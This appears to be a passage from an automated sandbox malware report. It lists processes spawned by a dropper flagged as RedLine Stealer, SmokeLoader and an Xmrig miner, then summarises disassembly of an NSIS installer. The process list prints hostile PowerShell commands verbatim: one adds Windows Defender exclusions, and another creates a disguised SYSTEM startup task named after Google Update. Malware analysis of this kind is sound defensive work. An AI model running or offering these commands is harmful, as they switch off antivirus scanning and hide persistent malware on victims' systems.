Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff68ea30000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	15:35:35
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Roaming\cdttvvc
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\cdttvvc
Imagebase:	0x400000
File size:	270'848 bytes
MD5 hash:	DCBD05276D11111F2DD2A7EDF52E3386
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	15:35:35
Start date:	10/11/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff68ea30000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	15:35:41
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Roaming\cdttvvc
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\cdttvvc
Imagebase:	0x400000
File size:	270'848 bytes
MD5 hash:	DCBD05276D11111F2DD2A7EDF52E3386
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	15:35:55
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\conhost.exe
Imagebase:	0x7ff7403e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	15:35:55
Start date:	10/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Analysis Process: conhost.exePID: 4928, Parent PID: 2532

General

Target ID:	62
Start time:	15:35:55
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	15:35:56
Start date:	10/11/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000002.4558997865.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708781420.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708852084.0000000001958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2684879397.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000002.4558997865.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708747670.0000000001975000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708491367.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000002.4572426073.0000000001950000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2707785171.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708950297.0000000001963000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000002.4558997865.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708399343.0000000001979000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708993303.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	64
Start time:	15:35:57
Start date:	10/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	15:35:58
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 01E90590 Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2151497296.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967df1ec9b8ef0071b448b2b6ef0df16bcd0534d666c21387660197e8314843b
Instruction ID: a1d2dc5597c6e8c9e157f201e8e778b51c020eca6ba3518d13a1daf8bf79a83c
Opcode Fuzzy Hash: 967df1ec9b8ef0071b448b2b6ef0df16bcd0534d666c21387660197e8314843b
Instruction Fuzzy Hash: 8F613134A0134ACFCB15DFB8E590A9EB7B2FF89305F5049A8D410AB364DB39AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01E90A90 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2151497296.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac96d7dedda36617df0d05b6c0aa2b6232c892e1503bd8c8e161153788b6a40d
Instruction ID: 6d21e38da7404cd6adef0793782be441027133d5f9f7c470f85749394029d013
Opcode Fuzzy Hash: ac96d7dedda36617df0d05b6c0aa2b6232c892e1503bd8c8e161153788b6a40d
Instruction Fuzzy Hash: 9B71C3347002419FDB29EF38D458A1DBBE6FF84318B958469E906CB395DB74EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01E90848 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2151497296.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d97689c05cfef951b64109b6b7dd4d5bd9b932a37d16855bbaa2a864de7253bc
Instruction ID: 63ee5427419d527f89af932df04c30901005305751e933424947beb27f2f4f11
Opcode Fuzzy Hash: d97689c05cfef951b64109b6b7dd4d5bd9b932a37d16855bbaa2a864de7253bc
Instruction Fuzzy Hash: A6612E34A0134ACFCB15DF78E590A9EB7B2FF89305F604968D410AB364DB39AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01E90D18 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2151497296.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b87d0741991274c46535d58b34c25e83e107dd7e0ba9dbe0d93d2527de01052a
Instruction ID: 66a1eda1cf5b3e80e2294e4b626754948336d5f64e10dd900585f74bcabb83ae
Opcode Fuzzy Hash: b87d0741991274c46535d58b34c25e83e107dd7e0ba9dbe0d93d2527de01052a
Instruction Fuzzy Hash: 9731F23060029A8BCF11DBAED8405AEBBF9EF85318B548179E9589B252DA30ED05C7D1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallSetup5.exePID: 4616, Parent PID: 5776COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16%
Total number of Nodes:	1335
Total number of Limit Nodes:	16

Executed Functions

Function 00403532 Relevance: 79.2, APIs: 32, Strings: 13, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(00442800,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNEL32(?,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

Error launching installer, xrefs: 004038FD
NSIS Error, xrefs: 00403695
Low, xrefs: 00403848
UXTHEME, xrefs: 00403620, 00403625, 0040362B
C:\Users\user\AppData\Local\Temp, xrefs: 00403972
TEMP, xrefs: 0040385A
SeShutdownPrivilege, xrefs: 00403AD8
C:\Users\user\AppData\Local\Temp, xrefs: 00403927
TMP, xrefs: 00403862
\Temp, xrefs: 0040382C
1033, xrefs: 00403876
~nsu%X.tmp, xrefs: 004039A8
C:\Users\user\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: 1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-164033496
Opcode ID: 2e41678f2876b0813857cd97e76b44bbe4b3eeb6df5acb682b8643e6af53fd03
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 2e41678f2876b0813857cd97e76b44bbe4b3eeb6df5acb682b8643e6af53fd03
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403C29 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

GetUserDefaultUILanguage.KERNELBASE(00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420), ref: 00403D2A
lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

RichEdit, xrefs: 00403E84
.DEFAULT\Control Panel\International, xrefs: 00403C95
_Nb, xrefs: 00403DAD, 00403E15
.exe, xrefs: 00403D37
RichEdit20W, xrefs: 00403E75, 00403E7B
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
RichEd32, xrefs: 00403E65
1033, xrefs: 00403C49, 00403CA5
RichEd20, xrefs: 00403E57
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2E

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-2896555866
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403082 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00442800,00442800,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

Error launching installer, xrefs: 004030D2
Null, xrefs: 00403179
soft, xrefs: 00403170
Inst, xrefs: 00403167
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
C:\Users\user\AppData\Local\Temp, xrefs: 004030DD, 004030E2, 004030E8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2013321303
Opcode ID: 18071a83ec6fb142dc69507f2a99f9a57da6e94b99e66eca773901507235fdac
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 18071a83ec6fb142dc69507f2a99f9a57da6e94b99e66eca773901507235fdac
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004032B9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

A, xrefs: 00403483
... %d%%, xrefs: 00403400
A, xrefs: 00403379
*B, xrefs: 004032E4

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%
API String ID: 551687249-3485722521
Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Uniqueness

Uniqueness Score: -1.00%

